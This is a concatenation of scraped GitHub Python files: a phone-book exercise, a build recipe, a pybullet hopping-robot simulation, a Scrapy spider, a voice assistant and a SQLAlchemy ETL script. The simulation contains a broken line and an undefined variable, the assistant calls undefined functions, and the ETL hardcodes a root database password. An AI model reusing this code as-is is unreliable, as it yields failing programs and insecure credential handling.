semantic_manifest\n","repo_name":"dbt-labs/dbt-semantic-interfaces","sub_path":"dbt_semantic_interfaces/transformations/add_input_metric_measures.py","file_name":"add_input_metric_measures.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"38"}
+{"seq_id":"37527994613","text":"\"\"\"\nTask\nGiven n names and phone numbers, assemble a phone book that maps friends' names to their respective\nphone numbers. You will then be given an unknown number of names to query your phone book for. \nFor each name queried, print the associated entry from your phone book on a new line in the form \nname=phoneNumber; if an entry for name is not found, print Not found instead.\n\nNote: Your phone book should be a Dictionary/Map/HashMap data structure.\n\"\"\"\n\nn = int(input())\nphoneBook = {}\n\n# Fill a phonebook\nfor i in range(0, n):\n entry = str(input()).split(\" \")\n name = entry[0]\n number = entry[1] \n phoneBook[name] = number\n \n# Use while loop because don't know how many name entries will be\nwhile True:\n try:\n name = input()\n except:\n break\n if name in phoneBook:\n number = phoneBook[name]\n print(name + \"=\" + number)\n else:\n print(\"Not found\")","repo_name":"irsol/hacker-rank-30-days-of-code","sub_path":"Day 8: Dictionaries and Maps.py","file_name":"Day 8: Dictionaries and Maps.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"3887392463","text":"metadata = \"\"\"\nsummary @ Creates PKZIP-compatible .zip files\nhomepage @ http://www.info-zip.org/pub/infozip/Zip.html\nlicense @ Info-ZIP\nsrc_url @ ftp://ftp.info-zip.org/pub/infozip/src/$name30.zip\narch @ ~x86_64\n\"\"\"\n\nstandard_procedure = False\n\nsrcdir = \"zip30\"\n\ndef build():\n make(\"-f unix/Makefile LOCAL_ZIP='%s' prefix=/usr generic_gcc\" % get_env(\"CFLAGS\"))\n\ndef install():\n raw_install(\"-f unix/Makefile INSTALL=/bin/install prefix=%s/usr \\\n MANDIR=%s/usr/share/man/man1\" % (install_dir, install_dir))\n\n insdoc(\"LICENSE\")\n","repo_name":"wdysln/new","sub_path":"app-arch/zip/zip-3.0.py","file_name":"zip-3.0.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"4588339274","text":"from impulse.root import root_mtg\nfrom openalea.plantgl.all import Viewer\n\ng = root_mtg.mtg_root()\n\ns = root_mtg.Simulate(g)\n\nfor i in range(100):\n s.step()\n scene = root_mtg.plot(g)\n Viewer.display(scene)\n\n\n","repo_name":"openalea-incubator/impulse","sub_path":"src/impulse/root/test_root.py","file_name":"test_root.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"74098695471","text":"# -*- coding: utf-8 -*-\n\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\nfrom blogArticle.items import BlogArticleItem\n\n\nclass ArticleSpiderSpider(CrawlSpider):\n name = 'article_spider'\n allowed_domains = ['jianshu.com']\n start_urls = ['https://www.jianshu.com/p/61b9ef649461']\n\n rules = (\n Rule(LinkExtractor(allow=r'.*/p/[0-9a-z]{12}.*'), callback='parse_item', follow=True),\n )\n\n def parse_item(self, response):\n # 文章的标题 a_title\n title = response.xpath(\"//h1[@class='_1RuRku']/text()\").get()\n\n # 文章分类 对应item里面a_category\n category = 'Python'\n\n # 文章的发布时间 对应item里面的a_release_time ajax请求的数据,,\n release_time = response.xpath(\"//div[@class='s-dsoj']/time/text()\").get().replace(\".\", '-')\n\n # 文章的观看人数 对应item里面的a_watch_number ajax请求的数据\n read_number = response.xpath(\"//div[@class='s-dsoj']/span[last()]/text()\").get()\n read_number = int(read_number.split(\" \")[1].replace(\",\", '')) # 阅读 5,648 --> 5648 转成int\n\n # 文章的类容 对应item里面的a_content ajax请求的数据,\n content = \"\".join(response.xpath(\"//article[@class='_2rhmJa']\").getall())\n\n # 源地址 对应item里面的 a_origin\n origin = response.url.split(\"?\")[0]\n\n # 文章的简介 对应item里面a_introduce\n introduce = response.xpath(\"//article[@class='_2rhmJa']/blockquote/p/text()\").get()\n if not introduce:\n # 为空默认从文章中摘取一段\n introduce = response.xpath(\"//article[@class='_2rhmJa']/p[5]/text()\").get()\n\n # 文章简介图片 对应item里面a_introduce_img\n introduce_img = response.xpath(\"//article[@class='_2rhmJa']//img/@data-original-src\").get()\n\n item = BlogArticleItem(\n a_title=title,\n a_category=category,\n a_release_time=release_time,\n a_read_number=read_number,\n a_content=content,\n a_origin=origin,\n a_introduce=introduce,\n a_introduce_img=introduce_img,\n )\n\n yield item\n","repo_name":"Qunoal/blog-crawler","sub_path":"blogArticle/spiders/article_spider.py","file_name":"article_spider.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"26343926878","text":"import pybullet as p\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# physicsClient = p.connect(p.GUI)#or p.DIRECT for non-graphical version\n\n# p.setAdditionalSearchPath(pybullet_data.getDataPath()) #this will load the plane urdf \np.connect(p.GUI)\np.configureDebugVisualizer(p.COV_ENABLE_GUI,0)\np.configureDebugVisualizer(p.COV_ENABLE_RGB_BUFFER_PREVIEW,0)\np.createCollisionShape(p.GEOM_PLANE)\nplId=p.createMultiBody(0,0)\np.resetDebugVisualizerCamera( cameraDistance=4, cameraYaw=10, cameraPitch=-20, \n cameraTargetPosition=[0.0, 0.0, 0.25])\np.setGravity(0,0,-10) #along the Z axis\n\n# planeId = p.loadURDF(\"plane.urdf\")\n\n#---loading the bodyId----:\nfootIdos = [0,0,1] # it will be spawned at z=1\nstartOrientation = p.getQuaternionFromEuler([0,0,0]) #angle at which it will be spawned\n\n\n#creating the robot:\nsh_colFoot = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.01,0.1])\nsh_colBody = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.2,0.2,0.1])\nsh_colBody = p.createCollisionShape(p.GEOM_CYLINDER,radius=0.13, height=0.6)\nsh_visBody = p.createVisualShape(p.GEOM_CYLINDER,radius=0.13, length=0.6, rgbaColor=[0.4,0.4,0.5,1])\nsh_colPx = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.1,0.1])\nsh_colPy = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.1,0.01,0.1])\n\nbodyId=p.createMultiBody(baseMass=1,baseCollisionShapeIndex = sh_colBody, baseVisualShapeIndex = sh_visBody,\n basePosition = [0,0,1.5],baseOrientation=[0,0,0,1])\nfootId=p.createMultiBody(baseMass=1,baseCollisionShapeIndex = sh_colFoot,\n basePosition = [0,0,0.5],baseOrientation=[0,0,0,1])\n\n# base = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.1,0.1,0.1])\n# sh_colFoot = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.01,0.1])\n# sh_colPx = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.1,0.1])\n# sh_colPy = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.1,0.01,0.1])\n# sh_colBody = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.2,0.2,0.1])\n# Body_1 = p.createCollisionShape(p.GEOM_CYLINDER,radius=0.13, height=0.6)\n# sh_visBody = p.createVisualShape(p.GEOM_CYLINDER,radius=0.13, length=0.6, rgbaColor=[0.4,0.4,0.5,1])\n\n\n# bodyId=p.crefootIdtiBody(baseMass=1,baseCollisionShapeIndex = Body_1,baseVisualShapeIndex = sh_visBody,\n# basePosition = [0,0,1.5],baseOrientation=[0,0,0,1])\n\n# footID=p.createMultiBody(baseMass = 1,baseCollisionShapeIndex = sh_colFoot, \n# basePosition = [0,0,0.5],baseOrientation=startOrientation)\n\n# #----------------------INERTIA INCREASING PLATES-----------------------\n# cubeId3=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPx,\n# basePosition = [-0.5,0,1.5],baseOrientation=[0,0,0,1])\n# cubeId4=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPx,\n# basePosition = [0.5,0,1.5],baseOrientation=[0,0,0,1])\n# cubeId5=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPy,\n# basePosition = [0,-0.5,1.5],baseOrientation=[0,0,0,1])\n# cubeId6=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPy,\n# basePosition = [0,0.5,1.5],baseOrientation=[0,0,0,1])\ncubeId3=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPx,\n basePosition = [-0.5,0,1.5],baseOrientation=[0,0,0,1])\ncubeId4=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPx,\n basePosition = [0.5,0,1.5],baseOrientation=[0,0,0,1])\ncubeId5=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPy,\n basePosition = [0,-0.5,1.5],baseOrientation=[0,0,0,1])\ncubeId6=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPy,\n basePosition = [0,0.5,1.5],baseOrientation=[0,0,0,1])\n\n#Scenery e.g. an inclined box\nboxHalfLength = 2.5\nboxHalfWidth = 2.5\nboxHalfHeight = 0.2\nsh_colBox = p.createCollisionShape(p.GEOM_BOX,halfExtents=[boxHalfLength,boxHalfWidth,boxHalfHeight])\nsh_visBox = p.createVisualShape(p.GEOM_BOX,halfExtents=[boxHalfLength,boxHalfWidth,boxHalfHeight], rgbaColor=[0,0,0,1])\n\nblock=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [-2,0,-0.1],baseOrientation=[0.0,0.1,0.0,1])\nsth=0.15\nblock2=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox, baseVisualShapeIndex = sh_visBox,\n basePosition = [5.75,0.15,-0.2+1*sth],baseOrientation=[0.0,0.0,0.0,1])\nblock3=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [5.75+0.33,0,-0.2+2*sth],baseOrientation=[0.0,0.0,0.0,1])\nblock4=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [5.75+0.66,0.2,-0.2+3*sth],baseOrientation=[0.1,0.0,0.0,1])\nblock5=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [5.75+0.99,0.1,-0.2+4*sth],baseOrientation=[0.0,-0.1,0.0,1])\n\nbox11l=0.5\nbox11w=0.5\nbox11h=0.1\nsh_box11 = p.createCollisionShape(p.GEOM_BOX,halfExtents=[box11l,box11w,box11h])\nsth=0.15\nfor k in range(10):\n p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box11,\n basePosition = [3+0.4*k,-1+k/200,k*sth],baseOrientation=[0.0,0.0,0.0,1])\np.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box11,\n basePosition = [3+0.4*10,-1,k*sth+0.01],baseOrientation=[0.0,0.0,0.0,1])\nfor k in range(10):\n p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box11,\n basePosition = [3+0.4*10+k/200,-0.5+0.4*k,(k+10)*sth],baseOrientation=[0.0,0.0,0.0,1])\nbox14_1l=7\nbox14_1w=0.75\nbox11h=0.1\nsh_box14_1 = p.createCollisionShape(p.GEOM_BOX,halfExtents=[box14_1l,box14_1w,box11h])\nbox14_1=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box14_1,\n basePosition = [-0.3,3.1,1.4],baseOrientation=[0.0,-0.1,0.0,1])\n\n\n\np.setGravity(0,0,-10)\np.setRealTimeSimulation(1)\n#make to plane less slippery\np.changeDynamics(plId,-1,lateralFriction=10)\np.changeDynamics(block5,-1,lateralFriction=10)\np.changeDynamics(box14_1,-1,lateralFriction=10)\n\n#connections:\ncid_0= p.createConstraint(bodyId, -1 ,footId, -1 , p.JOINT_FIXED, jointAxis=[0,0,0],parentFramePosition=[0,0,0], childFramePosition=[0,0,1])\ncid4 = p.createConstraint(bodyId,-1,cubeId3,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0.25,0,0])\ncid5 = p.createConstraint(bodyId,-1,cubeId4,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[-0.25,0,0])\ncid6 = p.createConstraint(bodyId,-1,cubeId5,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0,0.25,0])\ncid7 = p.createConstraint(bodyId,-1,cubeId5,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0,-0.25,0])\n\n\n# #simple simulation to start:\n# p.setTimeStep(0.001)\n# p.setRealTimeSimulation(1)\n\n\n#initiate:\npivot=[0,0,0,1]\ndecomprPhase=0\n\nJoints=p.getNumJoints(bodyId)\nCubePos, cubeOrn = p.getBasePositionAndOrientation(bodyId)\nDes= cubeOrn\nEuler=p.getEulerFromQuaternion(cubeOrn)\n\nt=0\ntstr=0\nvx=0\nvy=0\nzgnd=0\njmp=0\nxgl=7\nygl=-1\n\n\ndestination=[]\nx_vel=[]\ny_vel=[]\nz_vel=[]\nz_pos=[]\nx_pos=[]\ny_pos=[]\n\n1\n# while 1:\nfor i in range(1000):\n p.resetDebugVisualizerCamera( cameraDistance=6, cameraYaw=-130+t/10, cameraPitch=-60, \n cameraTargetPosition=[cubePos[0], cubePos[1], 0.25])\n t+=1 \n time.sleep(0.01)\n\n keys = p.getKeyboardEvents()\n if keys.get(65297): #Up\n vx+=0.002\n if keys.get(65298): #Down\n vx-=0.002\n if keys.get(65296): #Right\n vy-=0.002\n if keys.get(65295): #Left\n vy+=0.002\n if keys.get(97): #A\n if jmp==0: \n vx*=3\n vy*=3\n jmp=1\n \n if cubePos[0]3:\n xgl=-8\n if xgl==-8 and cubePos[0]<6.5:\n vy=-0.04\n \n #computing positions velocities, orientation angles, etc\n cube_prev=cubePos\n Euler_prev=Euler\n cubePos, cubeOrn = p.getBasePositionAndOrientation(bodyId)\n vel_x_cube_pos=(cubePos[0]-cube_prev[0])/0.01\n vel_y_cube_pos=(cubePos[1]-cube_prev[1])/0.01\n vel_z_cube_pos=(cubePos[2]-cube_prev[2])/0.01\n x_vel.append(vel_x_cube_pos)\n y_vel.append(vel_y_cube_pos)\n z_vel.append(vel_z_cube_pos)\n z_pos.append(cubePos[2])\n x_pos.append(cubePos[0])\n y_pos.append(cubePos[1])\n\n Euler=p.getEulerFromQuaternion(cubeOrn)\n omega_x=(Euler[0]-Euler_prev[0])/0.01\n omega_y=(Euler[1]-Euler_prev[1])/0.01\n\n x_foot, dum=p.getBasePositionAndOrientation(footId)\n if (vel_z_cube_pos>0 and decomprPhase==0):\n decomprPhase=1\n tstr=t \n zgnd=x_foot[2]+0.05\n\n if (x_foot[2]-zgnd>0.105 and decomprPhase==1):\n decomprPhase=2\n if jmp==1:\n vx=vx/3\n vy=vy/3\n jmp=0\n \n if x_foot[2]-zgnd<0.105 and decomprPhase==2:\n decomprPhase=0\n\n if decomprPhase==1:\n #decompressing: PD control on orientation of body during stance\n DesEU=p.getEulerFromQuaternion(Des)\n Des = p.getQuaternionFromEuler(DesEU + np.array([-0.07*omega_x-0.3*Euler[0] -0.15*(-(vel_y_cube_pos-vy)*np.cos(Euler[2])+(vel_x_cube_pos-vx)*np.sin(Euler[2])),\n -0.07*omega_y-0.3*Euler[1] -0.15*( (vel_x_cube_pos-vx)*np.cos(Euler[2])+(vel_y_cube_pos-vy)*np.sin(Euler[2])),0.0]))\n if ((t-tstr)<8 and jmp==1): #trust for a small time interval (increased spring force)\n p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=1300)\n elif ((t-tstr)<8):\n p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=600)\n else:\n p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=300)\n else:\n #flight and compression: Reposition foot for next landing based on body horizontal velocity and orientation\n if (x_foot[2]-zgnd>0.105):\n Des = p.getQuaternionFromEuler(\n [+0.15*(-(vel_y_cube_pos-0.0)*np.cos(Euler[2])+(vel_x_cube_pos-0.0)*np.sin(Euler[2])) + Euler[0],\n +0.15*( (vel_x_cube_pos-0.0)*np.cos(Euler[2])+(vel_y_cube_pos-0.0)*np.sin(Euler[2])) + Euler[1], 0.0])\n \n p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=300)\n destination.append(Des)\n\np.disconnect()\n\n\nxrot=[]\nyrot=[]\nzrot=[]\nfor i in range(len(destination)):\n print(p.getEulerFromQuaternion(destination[i]))\n xrot.append(destination[i][0])\n yrot.append(destination[i][1])\n zrot.append(destination[i][2])\n\nfig,axs=plt.subplots(7)\naxs[0].plot(xrot)\naxs[1].plot(yrot)\naxs[2].plot(zrot)\naxs[3].plot(x_vel)\naxs[4].plot(y_vel)\naxs[5].plot(z_vel)\naxs[6].plot(z_pos)\n\naxs[0].set_title(\"X rot Euler\")\naxs[1].set_title(\"y rot Euler\")\naxs[2].set_title(\"z rot Euler\")\naxs[3].set_title(\"X vel\")\naxs[4].set_title(\"y vel\")\naxs[5].set_title(\"z vel\")\naxs[6].set_title(\"z pos\")\n\n\n# plt.plot(destination)\nplt.show()\n\n","repo_name":"anushtup-nandy/Hopper_robot","sub_path":"Jumping_robot_sim.py","file_name":"Jumping_robot_sim.py","file_ext":"py","file_size_in_byte":11230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"9771950446","text":"from ZODB import FileStorage,DB\nimport transaction\nfrom modelo import Compania\nstorage = FileStorage.FileStorage('zodb/meubd.fs')\nbanco=DB(storage)\nconnection=banco.open()\nroot=connection.root()\n\n# percorrer as pessoas\nfor pe in root['empresas']:\n print(pe)\n\nconnection.close()","repo_name":"NaTTaNMendes/POO2","sub_path":"E9/OLHARDADOSZODB.PY","file_name":"OLHARDADOSZODB.PY","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"25805445277","text":"from pip import main\r\nimport pyttsx3\r\nimport datetime\r\nimport speech_recognition as sr\r\nimport wikipedia\r\nimport webbrowser\r\nimport os\r\n\r\n\r\nengine=pyttsx3.init('sapi5')\r\nvoices=engine.getProperty('voices')\r\n# print(voices[1].id)\r\nengine.setProperty('voice',voices[1].id)\r\n\r\n\r\n#SPEAK FUNCTION\r\n# ---------------------------------------------------------------------------------------------------------\r\ndef speak(audio):\r\n engine.say(audio)\r\n engine.runAndWait()\r\n\r\n#WISH ME FUNCTION\r\n# ----------------------------------------------------------------------------------------------------------\r\ndef wishMe():\r\n hour = int(datetime.datetime.now().hour)\r\n if hour>=0 and hour<12:\r\n speak(\"Good Morning!\")\r\n\r\n elif hour>=12 and hour<18:\r\n speak(\"Good Afternoon!\") \r\n\r\n else:\r\n speak(\"Good Evening!\") \r\n\r\n speak(\"I am Jarvis Sir. Please tell me how may I help you\") \r\n\r\n\r\n#TAKE COMMAND FUNCTION\r\n# ------------------------------------------------------------------------------------------------------\r\ndef takecommand():\r\n #takes microphone input from user and return string output\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n r.pause_threshold = 1 \r\n #seconds of non speaking audio before a phrase is considered complete\r\n audio = r.listen(source)\r\n try:\r\n print(\"Recognizing...\") \r\n query = r.recognize_google(audio, language='en-in')\r\n print(f\"User said: {query}\\n\")\r\n\r\n except Exception as e:\r\n # print(e) \r\n print(\"Say that again please...\") \r\n return \"None\"\r\n return query \r\n\r\n\r\n #email function\r\n #----------------------------------------------------------------------------------------------------------\r\n def sendEmail(to, content):\r\n server = smtplib.SMTP('smtp.gmail.com', 587)\r\n server.ehlo()\r\n server.starttls()\r\n server.login('youremail@gmail.com', 'your-password')\r\n server.sendmail('youremail@gmail.com', to, content)\r\n server.close()\r\n\r\n\r\n#MAIN FUNCTION\r\n#--------------------------------------------------------------------------------------------------------------\r\n\r\nif __name__== \"__main__\":\r\n # speak(\"shalini is good girl\")\r\n wishMe()\r\n\r\n while(True):\r\n query=takecommand().lower()\r\n #Logic for executing tasks based on query\r\n\r\n#--------------------------------------------------------------------------------------------------------------\r\n if 'wikipedia' in query:\r\n speak('Searching Wikipedia...')\r\n query = query.replace(\"wikipedia\", \"\")\r\n results = wikipedia.summary(query, sentences=5)\r\n #jarvis read 5 sentences \r\n speak(\"According to Wikipedia....................\")\r\n print(results)\r\n speak(results)\r\n\r\n elif 'open youtube' in query:\r\n webbrowser.open(\"youtube.com\")\r\n\r\n elif 'open google' in query:\r\n webbrowser.open(\"google.com\")\r\n\r\n elif 'open stackoverflow' in query:\r\n webbrowser.open(\"stackoverflow.com\") \r\n \r\n elif 'open HackerRank' in query:\r\n webbrowser.open(\"hackerrank.com\") \r\n \r\n elif 'play music' in query:\r\n music_dir = 'G:\\\\Favouritesongs'\r\n #path of music folder\r\n songs = os.listdir(music_dir)\r\n # print(songs) \r\n os.startfile(os.path.join(music_dir, songs[0]))\r\n #it will play 1st song of your playlist if u want to play random then we have to use random module\r\n\r\n elif 'the time' in query:\r\n strTime = datetime.datetime.now().strftime(\"%H:%M:%S\") \r\n speak(f\"Sir, the time is {strTime}\")\r\n\r\n \r\n elif 'open code' in query:\r\n codePath = \"C:\\\\Users\\\\HP\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\"\r\n os.startfile(codePath)\r\n #opening the file\r\n\r\n elif 'email to harry' in query:\r\n try:\r\n speak(\"What should I say?\")\r\n content = takeCommand()\r\n to = \"harryyourEmail@gmail.com\" \r\n sendEmail(to, content)\r\n speak(\"Email has been sent!\")\r\n except Exception as e:\r\n print(e)\r\n speak(\"Sorry my friend harry bhai. I am not able to send this email\") \r\n #this email only work when we change our security to less secure app \r\n\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n","repo_name":"shalini0517/Jarvis-AI-desktop","sub_path":"jarvis.py","file_name":"jarvis.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"10048269935","text":"\"\"\" \n:author: Tal Peretz\n:date: 11/11/2016\n:TL;DR: this module purpose is generating datasets for pyds tests\n\"\"\"\n\nimport os\n\nimport pandas as pd\nimport sklearn.datasets\n\nsave_attribute_to_file_extension = {'to_excel': 'xls', 'to_html': 'html', 'to_json': 'json', 'to_pickle': 'pickle',\n 'to_stata': 'stata', 'to_sql': 'sql', 'to_csv': 'csv', }\nDATASETS_PATH = os.path.abspath(\"\")\n\ndatasets = (\n sklearn.datasets.load_boston(),\n sklearn.datasets.fetch_california_housing())\n\n\ndef save_datasets(datasets_collection):\n for i, dataset in enumerate(datasets_collection):\n dataset_name = dataset['DESCR'].split('\\n')[0]\n # build path variable, check if exists, if not create it\n path = DATASETS_PATH + '/' + dataset_name + '/'\n file_name = 'train.%s' % tuple(save_attribute_to_file_extension.values())[i]\n if not os.path.exists(path):\n os.makedirs(path)\n\n # build the dataframe in the form of data columns and target variable in one DataFrame\n df = pd.concat([pd.DataFrame(data=dataset['data'], columns=dataset['feature_names']),\n pd.Series(data=dataset['target'], name='target')], axis=1)\n\n # save the resulting DataFrame in a format from save_attribute_to_file_extension\n getattr(df, tuple(save_attribute_to_file_extension.keys())[i])(path + file_name)\n\n\nif __name__ == '__main__':\n save_datasets(datasets)\n","repo_name":"talperetz/pyds","sub_path":"tests/resources/datasets/save_datasets.py","file_name":"save_datasets.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"}
+{"seq_id":"10449781960","text":"import re\n\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\n\ndef remove_special_chars(x):\n return re.sub(r\"[^a-zA-Z0-9]+\", ' ', x)\n\n\ndef transform_str(value):\n if type(value) is not str:\n return None\n new = remove_special_chars(value)\n return new.upper()\n\n\ndef ingest_dim_local(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_local\"\n\n results = source_connection.execute(\"\"\"\n (SELECT\n customer_zip_code_prefix as zip_code_prefix,\n customer_city as city,\n customer_state as state\n FROM customer)\n UNION\n (SELECT\n seller_zip_code_prefix as zip_code_prefix,\n seller_city as city,\n seller_state as state\n FROM seller);\n\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n data.drop_duplicates(subset=['zip_code_prefix'], keep='first', inplace=True)\n data[\"city\"] = data[\"city\"].map(transform_str)\n data[\"state\"] = data[\"state\"].map(transform_str)\n\n data.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_product(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_product\"\n\n results = source_connection.execute(\"\"\"\n SELECT\n product.product_id as original_id,\n product.product_category_name as category_name\n FROM product;\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n data[\"category_name\"] = data[\"category_name\"].map(transform_str)\n\n data.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_order_payment_and_dim_payment(source_engine, dw_engine):\n source_connection = source_engine.connect()\n\n results = source_connection.execute(\"\"\"\n SELECT\n order_id as order_id,\n payment_sequential as sequential,\n payment_type as type,\n payment_installments as installments,\n payment_value as value\n FROM order_payment;\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n order_payment = data[['order_id']].copy()\n order_payment.drop_duplicates(subset=['order_id'], keep='first', inplace=True)\n order_payment.to_sql(name=\"dim_order_payment\", con=dw_engine, if_exists='append', index=False)\n order_payment = pd.read_sql_table(\"dim_order_payment\", con=dw_engine)\n\n data = pd.merge(data, order_payment, on='order_id')\n data.rename({'id': 'order_payment_id'}, axis=1, inplace=True)\n payment = data[['order_payment_id', 'sequential', 'type', 'installments', 'value']].copy()\n payment.to_sql(name=\"dim_payment\", con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_seller(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_seller\"\n\n results = source_connection.execute(\"\"\"\n SELECT \n seller_id as original_id,\n seller_zip_code_prefix as zip_code_prefix\n FROM seller;\n \"\"\")\n seller = pd.DataFrame(results.fetchall())\n seller.columns = results.keys()\n\n dim_local = pd.read_sql_table(\"dim_local\", con=dw_engine)\n\n data = pd.merge(seller, dim_local, on='zip_code_prefix')\n data.rename({'id': 'local_id'}, axis=1, inplace=True)\n dim_seller = data[['original_id', 'local_id']].copy()\n dim_seller.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_customer(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_customer\"\n\n results = source_connection.execute(\"\"\"\n SELECT \n customer_id as original_id,\n customer_unique_id as unique_id,\n customer_zip_code_prefix as zip_code_prefix\n FROM customer;\n \"\"\")\n customer = pd.DataFrame(results.fetchall())\n customer.columns = results.keys()\n\n dim_local = pd.read_sql_table(\"dim_local\", con=dw_engine)\n\n data = pd.merge(customer, dim_local, on='zip_code_prefix')\n data.rename({'id': 'local_id'}, axis=1, inplace=True)\n dim_seller = data[['original_id', 'local_id', 'unique_id']].copy()\n dim_seller.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_date(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_date\"\n\n results = source_connection.execute(\"\"\"\n (SELECT \n DAY(order_purchase_timestamp) as day,\n MONTH(order_purchase_timestamp) as month,\n YEAR(order_purchase_timestamp) as year,\n DATE_FORMAT(order_purchase_timestamp, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_purchase_timestamp IS NOT NULL)\n UNION\n (SELECT \n DAY(order_approved_at) as day,\n MONTH(order_approved_at) as month,\n YEAR(order_approved_at) as year,\n DATE_FORMAT(order_approved_at, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_approved_at IS NOT NULL)\n UNION\n (SELECT \n DAY(order_delivered_carrier_date) as day,\n MONTH(order_delivered_carrier_date) as month,\n YEAR(order_delivered_carrier_date) as year,\n DATE_FORMAT(order_delivered_carrier_date, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_delivered_carrier_date IS NOT NULL)\n UNION\n (SELECT \n DAY(order_delivered_customer_date) as day,\n MONTH(order_delivered_customer_date) as month,\n YEAR(order_delivered_customer_date) as year,\n DATE_FORMAT(order_delivered_customer_date, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_delivered_customer_date IS NOT NULL)\n UNION\n (SELECT \n DAY(order_estimated_delivery_date) as day,\n MONTH(order_estimated_delivery_date) as month,\n YEAR(order_estimated_delivery_date) as year,\n DATE_FORMAT(order_estimated_delivery_date, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_estimated_delivery_date IS NOT NULL);\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n data.drop_duplicates(subset=['str'], keep='first', inplace=True)\n data.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dims():\n source_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/sourceDB\", echo=False)\n dw_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/dw\", echo=False)\n\n ingest_dim_date(source_engine, dw_engine)\n ingest_dim_local(source_engine, dw_engine)\n ingest_dim_product(source_engine, dw_engine)\n ingest_dim_order_payment_and_dim_payment(source_engine, dw_engine)\n ingest_dim_seller(source_engine, dw_engine)\n ingest_dim_customer(source_engine, 